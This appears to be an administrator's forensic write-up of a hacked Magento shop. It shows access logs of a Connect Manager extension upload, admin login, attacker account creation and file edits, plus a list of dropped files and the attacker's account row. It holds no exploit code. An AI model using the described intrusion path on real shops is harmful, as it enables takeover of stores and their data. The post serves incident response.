120.188.94.254 - - [04/Dec/2016:23:05:55 +0100] "POST / HTTP/1.1" 404 716 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:59 +0100] "GET / HTTP/1.1" 403 686 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

... but just a few seconds before that, some very interesting requests happened:

120.188.94.254 - - [04/Dec/2016:23:03:49 +0100] "POST /index.php/filesystem/adminhtml_filesystem/tree/isAjax/1/form_key/JzG8egEj5wWSin3q/key/b853d2a14508a9fa48d60ff5c48119c1/ HTTP/1.1" 200 222 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:03:52 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vc2hlbGwvaW5kZXhlci5waHA=/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 2697 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:03:57 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 1553 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:08 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/996204877/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:09 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/1073874282/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:39 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 80 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:42 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vY3Jvbi5zaA==/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 1007 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:44 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 80 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:51 +0100] "POST /index.php/filesystem/adminhtml_filesystem/save/file/2083702503/key/29bbfb400565c179873af433f751fe64/?isAjax=true HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:53 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/2083702503/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5198 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:55 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/1089227211/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5273 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:57 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5361 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

It seems that some filesystem plugin/extension was installed. My research pointed me to https://www.reddit.com/r/hacking/comments/34025m/magento_exploit_downlaoding_magpleasurefilesystem/ where the extension "Magpleasure Filesystem" was installed after a hack. And as in the reddit post, the extension seems to have been installed through the "/downloader" subfolder (hat's the fixed URL for the Magento Connect Manager):

125.161.32.96 - - [04/Dec/2016:22:52:22 +0100] "POST //downloader/ HTTP/1.1" 200 6990 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:52:33 +0100] "GET /downloader/index.php?A=empty HTTP/1.1" 200 1167 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:53:26 +0100] "POST /downloader/index.php?A=connectInstallPackageUpload&maintenance=1&archive_type=0&backup_name= HTTP/1.1" 200 1192 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:53:29 +0100] "POST /downloader/index.php?A=cleanCache HTTP/1.1" 200 95 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

And right after that, a successful login in the admin interface seems to have happened (notice the successful css loaded):

91.211.2.12 - - [04/Dec/2016:22:53:41 +0100] "GET /index.php/admin/ HTTP/1.1" 200 1255 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
91.211.2.12 - - [04/Dec/2016:22:53:41 +0100] "POST /index.php/admin/ HTTP/1.1" 200 1314 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:55:12 +0100] "GET /skin/adminhtml/default/default/reset.css HTTP/1.1" 200 2925 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

In general the Magento Connect Manager, which is always available under MAGENTOURL/downloader, should be disabled. This page has some additional information.

Through the upload in Connect Manager (non-authenticated? a vulnerability in Connect Manager? I'm not sure) the hacker was able to gain access to the admin dashboard and a few minutes later created his own admin user (note: I am only showing the newly created account, all other accounts are removed from the output for privacy reasons):

mysql> select user_id, email, username, password, created, modified from admin_user;
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
| user_id | email                          | username       | password                                 | created             | modified            |
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
|      20 | admin@demo.com                 | admins         | 864eb4c20f8ab86d595c28434fff16a7:xX      | 2016-12-04 22:56:15 | NULL                |
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
5 rows in set (0.00 sec)

The hacker then successfully created his own admin account (Username admins) at 22:56:15, which was this POST:

125.161.32.96 - - [04/Dec/2016:22:56:15 +0100] "POST /index.php/admin/ HTTP/1.1" 302 0 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

So what is the source for the hack? From what I can see in the logs there are two possibilities:

1) There's a vulnerability in Magento Connect Manager which allows to upload and install extensions without authentication
2) The hacker used an already existing admin user. Either through brute-force login or (worse) through a previous hack. Potentially the "shoplift" vulnerability (see here for more information) could have been used in the past to create a new admin account before the shop was patched.

Either way, I contacted the shop administrator and cleaned up the files modified since Dec 4th. Here's a complete list:

webserver:/srv/websites/shop.example.com/magento # find . -user wwwrun -mtime -2
./app/design/adminhtml/default/default/template/filesystem
./app/design/adminhtml/default/default/template/filesystem/ide
./app/design/adminhtml/default/default/template/filesystem/ide/editor.phtml
./app/design/adminhtml/default/default/template/filesystem/ide/tree.phtml
./app/design/adminhtml/default/default/template/filesystem/ide.phtml
./app/design/adminhtml/default/default/template/filesystem/wrapper.phtml
./app/design/adminhtml/default/default/layout/filesystem.xml
./app/etc/modules/Magpleasure_Filesystem.xml
./app/code/community/Magpleasure
./app/code/community/Magpleasure/Filesystem
./app/code/community/Magpleasure/Filesystem/Helper
./app/code/community/Magpleasure/Filesystem/Helper/Data.php
./app/code/community/Magpleasure/Filesystem/sql
./app/code/community/Magpleasure/Filesystem/sql/filesystem_setup
./app/code/community/Magpleasure/Filesystem/sql/filesystem_setup/mysql4-install-1.0.php
./app/code/community/Magpleasure/Filesystem/Model
./app/code/community/Magpleasure/Filesystem/Model/Tree.php
./app/code/community/Magpleasure/Filesystem/controllers
./app/code/community/Magpleasure/Filesystem/controllers/Adminhtml
./app/code/community/Magpleasure/Filesystem/controllers/Adminhtml/FilesystemController.php
./app/code/community/Magpleasure/Filesystem/etc
./app/code/community/Magpleasure/Filesystem/etc/adminhtml.xml
./app/code/community/Magpleasure/Filesystem/etc/system.xml
./app/code/community/Magpleasure/Filesystem/etc/config.xml
./app/code/community/Magpleasure/Filesystem/Block
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide/Editor.php
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide/Tree.php
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide.php
./js/filesystem
./js/filesystem/script.js
./js/filesystem/base64.js
./js/filesystem/jquery-1.4.2.min.js
./js/filesystem/script.coffee
./js/filesystem/jqueryfiletree.js
./js/editarea
./js/editarea/license_apache.txt
./js/editarea/edit_area_full.js
./js/editarea/highlight.js
./js/editarea/reg_syntax
./js/editarea/reg_syntax/css.js
./js/editarea/reg_syntax/python.js
./js/editarea/reg_syntax/pas.js
./js/editarea/reg_syntax/robotstxt.js
./js/editarea/reg_syntax/coldfusion.js
./js/editarea/reg_syntax/html.js
./js/editarea/reg_syntax/java.js
./js/editarea/reg_syntax/perl.js
./js/editarea/reg_syntax/cpp.js
./js/editarea/reg_syntax/phtml.js
./js/editarea/reg_syntax/php.js
./js/editarea/reg_syntax/brainfuck.js
./js/editarea/reg_syntax/ruby.js
./js/editarea/reg_syntax/basic.js
./js/editarea/reg_syntax/c.js
./js/editarea/reg_syntax/vb.js
./js/editarea/reg_syntax/js.js
./js/editarea/reg_syntax/sql.js
./js/editarea/reg_syntax/tsql.js
./js/editarea/reg_syntax/xml.js
./js/editarea/license_lgpl.txt
./js/editarea/search_replace.js
./js/editarea/langs
./js/editarea/langs/ja.js
./js/editarea/langs/bg.js
./js/editarea/langs/hr.js
./js/editarea/langs/zh.js
./js/editarea/langs/cs.js
./js/editarea/langs/de.js
./js/editarea/langs/es.js
./js/editarea/langs/fi.js
./js/editarea/langs/pl.js
./js/editarea/langs/pt.js
./js/editarea/langs/en.js
./js/editarea/langs/nl.js
./js/editarea/langs/fr.js
./js/editarea/langs/eo.js
./js/editarea/langs/dk.js
./js/editarea/langs/ru.js
./js/editarea/langs/mk.js
./js/editarea/langs/sk.js
./js/editarea/langs/it.js
./js/editarea/images
./js/editarea/images/search.gif
./js/editarea/images/processing.gif
./js/editarea/images/close.gif
./js/editarea/images/newdocument.gif
./js/editarea/images/redo.gif
./js/editarea/images/load.gif
./js/editarea/images/help.gif
./js/editarea/images/spacer.gif
./js/editarea/images/fullscreen.gif
./js/editarea/images/opacity.png
./js/editarea/images/word_wrap.gif
./js/editarea/images/reset_highlight.gif
./js/editarea/images/smooth_selection.gif
./js/editarea/images/move.gif
./js/editarea/images/autocompletion.gif
./js/editarea/images/undo.gif
./js/editarea/images/save.gif
./js/editarea/images/highlight.gif
./js/editarea/images/statusbar_resize.gif
./js/editarea/images/go_to_line.gif
./js/editarea/edit_area_compressor.php
./js/editarea/edit_area.css
./js/editarea/plugins
./js/editarea/plugins/charmap
./js/editarea/plugins/charmap/charmap.js
./js/editarea/plugins/charmap/langs
./js/editarea/plugins/charmap/langs/ja.js
./js/editarea/plugins/charmap/langs/bg.js
./js/editarea/plugins/charmap/langs/hr.js
./js/editarea/plugins/charmap/langs/zh.js
./js/editarea/plugins/charmap/langs/cs.js
./js/editarea/plugins/charmap/langs/de.js
./js/editarea/plugins/charmap/langs/es.js
./js/editarea/plugins/charmap/langs/pl.js
./js/editarea/plugins/charmap/langs/pt.js
./js/editarea/plugins/charmap/langs/en.js
./js/editarea/plugins/charmap/langs/nl.js
./js/editarea/plugins/charmap/langs/fr.js
./js/editarea/plugins/charmap/langs/eo.js
./js/editarea/plugins/charmap/langs/dk.js
./js/editarea/plugins/charmap/langs/ru.js
./js/editarea/plugins/charmap/langs/mk.js
./js/editarea/plugins/charmap/langs/sk.js
./js/editarea/plugins/charmap/langs/it.js
./js/editarea/plugins/charmap/images
./js/editarea/plugins/charmap/images/charmap.gif
./js/editarea/plugins/charmap/popup.html
./js/editarea/plugins/charmap/css
./js/editarea/plugins/charmap/css/charmap.css
./js/editarea/plugins/charmap/jscripts
./js/editarea/plugins/charmap/jscripts/map.js
./js/editarea/plugins/test
./js/editarea/plugins/test/test2.js
./js/editarea/plugins/test/langs
./js/editarea/plugins/test/langs/ja.js
./js/editarea/plugins/test/langs/bg.js
./js/editarea/plugins/test/langs/hr.js
./js/editarea/plugins/test/langs/zh.js
./js/editarea/plugins/test/langs/cs.js
./js/editarea/plugins/test/langs/de.js
./js/editarea/plugins/test/langs/es.js
./js/editarea/plugins/test/langs/pl.js
./js/editarea/plugins/test/langs/pt.js
./js/editarea/plugins/test/langs/en.js
./js/editarea/plugins/test/langs/nl.js
./js/editarea/plugins/test/langs/fr.js
./js/editarea/plugins/test/langs/eo.js
./js/editarea/plugins/test/langs/dk.js
./js/editarea/plugins/test/langs/ru.js
./js/editarea/plugins/test/langs/mk.js
./js/editarea/plugins/test/langs/sk.js
./js/editarea/plugins/test/langs/it.js
./js/editarea/plugins/test/images
./js/editarea/plugins/test/images/Thumbs.db
./js/editarea/plugins/test/images/test.gif
./js/editarea/plugins/test/test.js
./js/editarea/plugins/test/css
./js/editarea/plugins/test/css/test.css
./js/editarea/edit_area.js
./js/editarea/edit_area_functions.js
./js/editarea/regexp.js
./js/editarea/license_bsd.txt
./js/editarea/edit_area_loader.js
./js/editarea/resize_area.js
./js/editarea/keyboard.js
./js/editarea/template.html
./js/editarea/edit_area_full.gz
./js/editarea/autocompletion.js
./js/editarea/elements_functions.js
./js/editarea/manage_area.js
./js/editarea/reg_syntax.js
./bootstrap.php
./Sym.php
./index.php
./tmp
./tmp/mobile
./tmp/.htaccess
./configurations.php
./skin/adminhtml/default/default/filesystem
./skin/adminhtml/default/default/filesystem/images
./skin/adminhtml/default/default/filesystem/images/script.png
./skin/adminhtml/default/default/filesystem/images/ppt.png
./skin/adminhtml/default/default/filesystem/images/music.png
./skin/adminhtml/default/default/filesystem/images/html.png
./skin/adminhtml/default/default/filesystem/images/pdf.png
./skin/adminhtml/default/default/filesystem/images/application.png
./skin/adminhtml/default/default/filesystem/images/phtml.png
./skin/adminhtml/default/default/filesystem/images/flash.png
./skin/adminhtml/default/default/filesystem/images/linux.png
./skin/adminhtml/default/default/filesystem/images/zip.png
./skin/adminhtml/default/default/filesystem/images/db.png
./skin/adminhtml/default/default/filesystem/images/doc.png
./skin/adminhtml/default/default/filesystem/images/psd.png
./skin/adminhtml/default/default/filesystem/images/film.png
./skin/adminhtml/default/default/filesystem/images/spinner.gif
./skin/adminhtml/default/default/filesystem/images/file.png
./skin/adminhtml/default/default/filesystem/images/ruby.png
./skin/adminhtml/default/default/filesystem/images/picture.png
./skin/adminhtml/default/default/filesystem/images/directory.png
./skin/adminhtml/default/default/filesystem/images/folder_open.png
./skin/adminhtml/default/default/filesystem/images/java.png
./skin/adminhtml/default/default/filesystem/images/code.png
./skin/adminhtml/default/default/filesystem/images/txt.png
./skin/adminhtml/default/default/filesystem/images/xls.png
./skin/adminhtml/default/default/filesystem/images/css.png
./skin/adminhtml/default/default/filesystem/images/php.png
./skin/adminhtml/default/default/filesystem/css
./skin/adminhtml/default/default/filesystem/css/styles.css
./skin/adminhtml/default/default/filesystem/css/jqueryfiletree.css
./ljamailer.php
./downloader/Maged/index.php
./sym
./sym/file.name_sym ( Ex. :: 1.txt )
./sym/root
./sym/.htaccess
./[Cache files]
./var/resource_config.json
./var/package/File_System-1.0.0.xml
./var/package/tmp
./var/package/tmp/package.xml

At the end of the analysis I realized, the hacker was able to do:

- Information disclosure (by using a symlink to the web servers root directory)
- File uploads
- Spamming (through uploaded php script)
- Successful login as admin
- Create a new admin account
- Install an extension (Magpleasure Filesystem) through Connect Manager (authenticated or not, that's still the big question to me)

A successful day for a hacker - not so much for me as I have to clean up, restore backups and shout at the responsible webmaster.

 


Go to Homepage home
Linux Howtos how to's
Nagios Plugins nagios plugins
Links links

Valid HTML 4.01 Transitional
Valid CSS!
[Valid RSS]

7668 Days
until Death of Computers
Why?